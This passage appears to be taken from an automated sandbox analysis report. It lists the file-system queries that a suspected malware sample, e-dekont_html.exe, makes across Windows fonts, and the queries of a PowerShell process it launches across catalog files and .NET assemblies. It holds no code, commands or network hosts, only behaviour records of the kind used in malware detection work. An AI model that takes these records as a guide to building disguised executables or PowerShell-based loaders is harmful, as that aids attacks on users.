                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
